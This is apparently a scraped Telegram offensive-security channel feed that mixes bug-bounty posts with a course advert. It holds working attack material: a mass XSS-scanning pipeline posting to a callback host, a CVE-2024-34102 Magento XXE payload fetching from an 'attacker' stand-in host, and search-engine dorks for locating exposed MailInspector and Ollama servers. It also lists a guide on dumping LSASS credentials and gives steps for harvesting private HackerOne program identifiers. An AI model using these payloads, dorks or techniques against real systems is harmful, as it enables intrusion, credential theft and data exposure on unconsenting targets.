subfinder -dL domainlist1.txt | dnsx | shuf | (gau | | hakrawler) | anew | egrep -iv "\.(jpg|jpeg|gif|tif|tiff|png|ttf|woff|woff2|php|ico|pdf|noscript|txt|js)$" | urless | nilo | dalfox pipe -b https://xss.hunter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8👏1
Methods for Dump LSASS.pdf
33.4 MB
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6❤🔥5🔥1
Hunter: web.noscript=="..:: HSC MailInspector ::.."
FOFA: noscript=="..:: HSC MailInspector ::.."
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
🚨CVE-2024-34470: Path Traversal vulnerability in HSC Mailinspector! #computersecurity #cybersec
🚨CVE-2024-34470: An Unauthenticated Path Traversal vulnerability in HSC Mailinspector!👉An issue was discovered in HSC Mailinspector 5.2.17-3 through v.5.2....
🔥4❤🔥1👍1
💥 Registration Open for July Batch: Extreme Web Application Penetration Testing 💥
⚠️ Slots Remaining 4
💯Registration Link: https://lnkd.in/g7MjfrXG
Join us for an intensive 2-month course designed for beginners with basic IT & cybersecurity knowledge!
🖥 Starts: July Mid, 2024
ℹ️ Schedule: Mon, Wed, Fri | 12:00 PM - 2:00 PM IST
⏸ Mode: Online | Language: English
🔗 Course Module: https://lnkd.in/gfZbBCFn
💯Registration Link: https://lnkd.in/g7MjfrXG
Join us for an intensive 2-month course designed for beginners with basic IT & cybersecurity knowledge!
ℹ️ Schedule: Mon, Wed, Fri | 12:00 PM - 2:00 PM IST
⏸ Mode: Online | Language: English
🔗 Course Module:
Please open Telegram to view this post
VIEW IN TELEGRAM
lnkd.in
LinkedIn
This link will take you to a page that’s not on LinkedIn
👍1
ceh-v12-exam-set.pdf
1.6 MB
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
This media is not supported in your browser
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🤡5🤣2🐳1🤝1
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3❤🔥1
https://wa.me/message/NQLPOBIAEFDBN1
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯1
Looking for someone who can contribute on the next 30 days Bug Bounty Challenge.
Similar to this https://nas.io/brutsecurity
Similar to this https://nas.io/brutsecurity
🚨CVE-2024-37032: Probllama—Ollama Remote Code Execution Vulnerability
⚠️The issue relates to a case of insufficient input validation that results in a path traversal flaw. An attacker could exploit to overwrite arbitrary files on the server and ultimately lead to remote code execution.
🔥PoC: https://lnkd.in/gk6Wvq_P
💥Dorks:
Hunter: /product.name="Ollama Web"
FOFA: app="Ollama-Web"
⚠️The issue relates to a case of insufficient input validation that results in a path traversal flaw. An attacker could exploit to overwrite arbitrary files on the server and ultimately lead to remote code execution.
🔥PoC: https://lnkd.in/gk6Wvq_P
💥Dorks:
Hunter: /product.name="Ollama Web"
FOFA: app="Ollama-Web"
🔥1
CVE-2024-34102 POC
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://attacker*com/xxe.xml","dataIsURL":true,"options":1337}}}}}}
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://attacker*com/xxe.xml","dataIsURL":true,"options":1337}}}}}}
👍8
IDOR on HackerOne Embedded Submission Form 💰 💲
-
Steps to reproduce (obtaining inactive UUID of many private programs)
1- Use this command echo 'https://hackerone.com/' | waybackurls > lists.txt make sure you have waybackurls installed on your attackbox
2- cat lists.txt | grep "embedded_submissions" > results.txt
3- cat results.txt
4- You will find a lot of embedded submission id of many random private programs, you can check it by browsing each URL
-
https://lnkd.in/drCHC6qA
-
By @japzdivino
https://x.com/japzdivino
-
Steps to reproduce (obtaining inactive UUID of many private programs)
1- Use this command echo 'https://hackerone.com/' | waybackurls > lists.txt make sure you have waybackurls installed on your attackbox
2- cat lists.txt | grep "embedded_submissions" > results.txt
3- cat results.txt
4- You will find a lot of embedded submission id of many random private programs, you can check it by browsing each URL
-
https://lnkd.in/drCHC6qA
-
By @japzdivino
https://x.com/japzdivino
HackerOne
HackerOne | Global leader in offensive security | Security for AI | Crowdsourced Security
HackerOne combines AI with the ingenuity of the largest community of security researchers to find and fix security, privacy, and AI vulnerabilities across the SDLC. HackerOne offers AI red teaming, crowdsourced security, bug bounty, vulnerability disclosure…
👍3